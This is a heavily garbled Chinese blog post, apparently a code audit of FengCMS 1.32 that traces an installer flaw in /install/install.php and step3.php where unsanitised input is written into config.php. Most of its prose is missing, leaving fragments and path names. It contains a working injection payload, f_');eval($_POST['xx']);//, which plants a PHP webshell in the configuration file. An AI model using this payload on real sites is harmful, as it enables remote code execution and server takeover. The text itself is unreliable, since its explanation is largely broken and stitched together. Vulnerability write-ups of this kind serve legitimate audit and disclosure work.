[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

## 

!首发于哈拉少安全小队微信公众号

 

Cms

FengCmsPHP+MYSQLFengCmsFengCmsFengCms95%

 

-

 

 

 

fengcmspayload使webshellgetshell

 

 

--/install/index.php

installindex.php25installjs

 

 

GETstep

 

 

 

 

--/install/install.php

POST

 

 

$files$config$config()

 

$file在/install/install.php8

 

$config/install/data.phpfile_get_contents

 

$config_file/install/index.phpGETstep3.php

 

step3.php

 

/config.php

 

payloadpayload')//payloadconfig.php

 

 

/index.php/system/app.php

 

/system/app.php访index.phpconfig.phppayloadgetshell

 

 

 

1访

 

 

step3payload

f_');eval($_POST['xx']);//

 

 

config.phpwebshell

 

访index.php

 

 

 

访



 

1exit()

 

2

 

的关注公众号:哈拉少安全小队,fengcms1.32

 

posted @ 2020-12-20 15:00  PANDA墨森  阅读(294)  评论(0编辑  收藏  举报